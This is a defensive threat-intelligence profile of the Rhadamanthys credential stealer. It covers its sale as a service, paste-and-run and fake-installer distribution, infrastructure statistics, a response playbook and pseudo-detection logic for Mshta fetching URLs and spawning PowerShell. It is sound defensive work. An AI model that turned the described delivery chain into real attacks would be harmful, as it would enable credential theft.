Rhadamanthys
While Rhadamanthys stealer grew popular after the LummaC2 takedown, it soon fell victim to Operation Endgame.
#10
Overall Rank
1.6%
Customers Affected
Rhadamanthys is a commercially distributed stealer family that first appeared in underground markets around late 2022 and has since evolved through multiple versions. Sold as a MaaS offering, it gives even novice adversaries easy access to credential theft at scale. Like LummaC2, Rhadamanthys offers multiple price points for adversaries seeking to buy licensing and support for the stealer and related infrastructure.
Rhadamanthys is a modular platform, which allows its developers to actively maintain and extend its capabilities to evade detection. During 2025, the popularity of Rhadamanthys boomed shortly after international law enforcement actions against LummaC2 infrastructure as adversaries sought other stealer malware for operations. This popularity continued until November 2025, when international law enforcement agencies took action to take down Rhadamanthys’s infrastructure and seize systems as part of Operation Endgame.
Because it steals credentials from many different products, Rhadamanthys can facilitate breaches at organizations of all sizes and industries.
The “everything bagel” of stealers
Since Rhadamanthys is a MaaS offering, many different adversaries may buy the malware and use it against a plethora of targets. Rhadamanthys itself may be found across systems in many different countries and industries. Red Canary observed this opportunistic distribution in 2025 as adversaries adapted to deploying Rhadamanthys as payloads for paste-and-run activity after the LummaC2 takedown.
This lack of targeting has even proven troublesome for the Rhadamanthys developer, as they were banned from hacking forums for not restricting the stealer from executing in Commonwealth of Independent States (CIS) countries. This restriction is common among malware developers to avoid law enforcement attention in Russia.
For capabilities, Rhadamanthys has a comprehensive list of applications from which it can take passwords and other credentials. In an article where Check Point Research referred to Rhadamanthys as the “everything bagel,” researchers reported the stealer supports not only all major browser families but even some with very few users. In addition, the developers extended support for stealing credentials from browser extensions with as little as one registered user at the time.
Because it steals credentials from many different products, Rhadamanthys can facilitate breaches at organizations of all sizes and industries.
An autumn burst
August through October 2025 showed the most Rhadamanthys activity in our data, replacing LummaC2 during that time. During the year, one third of our Rhadamanthys threats were distributed via paste and run.
Rhadamanthys activity in 2025
For co-occurrances, Rhadamanthys was sometimes combined with CypherIT, HijackLoader, or LummaC2. HijackLoader and CypherIT were presumably used to help deliver Rhadamanthys while evading defenses, whereas its combination with LummaC2 in one case could indicate that the adversary who gained access either ran multiple stealers or allowed the access to be reused by another adversary with the second stealer.
In terms of network infrastructure, Red Canary processed 283 IP address indicators for Rhadamanthys in 2025. Taking a look at the autonomous system numbers (ASNs) for those IP addresses, Rhadamanthys used at least 97 different network providers during the year, stretching from legitimate providers to less savory ones. In fact, 34 of those 97 ASNs, or 35 percent, spent at least some time on the Spamhaus Do Not Route or Peer (DROP) list, indicating that the traffic from those sections of the internet were more likely to be fraudulent than not.
To see which network providers were the most popular, refer to the list of the ASN names and numbers below.
In cases where Rhadamanthys used SSL/TLS for command and control, the infrastructure nearly exclusively used self-signed certificates.
For endpoint process behaviors, Rhadamanthys is similar to other stealers in the sense that it emits precious little telemetry on its own. But when combined with crypters, loaders, and paste-and-run techniques, it can produce a variety of behaviors that are detectable.
Since Rhadamanthys has been distributed in so many different ways, preventative measures can take many approaches. We’ve observed Rhadamanthys distributed in fake software installations, paste-and-run campaigns, and more.
General preventative measures that apply to multiple malware families also help fight against Rhadamanthys:
- Provide safe software installation sources for users.
- Configure ad-blocking tools where possible.
- Deploy endpoint security controls for detection and protection.
Response
For response, an excellent playbook would look something like this:
- Delete all components delivering Rhadamanthys from disk, removing persistence
- Determine what account details are stored in the software on an affected system, including:
- browsers
- file transfer software like FileZilla and WinSCP
- Telegram messaging
- Steam gaming
- cryptocurrency wallets
- VPN profiles
- cloud credentials in CLI tool configuration
- sensitive files stored in the user’s Desktop and Documents folders
- Once you determine the scope of data theft, take steps to reset any credentials stored on the system. This may also involve manually revoking sessions to prevent cookie reuse.
Finally, if financial details such as payment cards or cryptocurrency wallets are stored on the affected system, users may need to monitor the relevant accounts for unauthorized transactions.
Mshta with URL in command line, Mshta spawning PowerShell
Of the paste-and-run instances deploying Rhadamanthys, several used a combination of Mshta and PowerShell commands in subsequent stages. These pseudo-detection analytics identify multiple threats that may be distributed in this manner.
Note: * is a placeholder for strings associated with legitimate use of this function in your environment.
process == (mshta)
&&
deobfuscated_command_line_includes (http)
&&
command_line_does_not_include == (*)
parent_process == (mshta)
&&
process == (powershell)
&&
command_line_does_not_include == (*)
Start testing your defenses against Rhadamanthys using Atomic Red Team—an open source testing framework of small, highly portable detection tests mapped to MITRE ATT&CK.
Getting started
The following atomic test uses Mshta to execute PowerShell and should serve as a good starting point for validating the efficacy of the detection opportunities listed above:
T1218.005 test number 10: Atomic Test #10: Mshta used to Execute PowerShell
Review and repeat
Now that you have executed one or several common tests and checked for the expected results, it’s useful to answer some immediate questions:
- Were any of your actions detected?
- Were any of your actions blocked or prevented?
- Were your actions visible in logs or other defensive telemetry?
Repeat this process, performing additional tests related to this technique. You can also create and contribute tests of your own.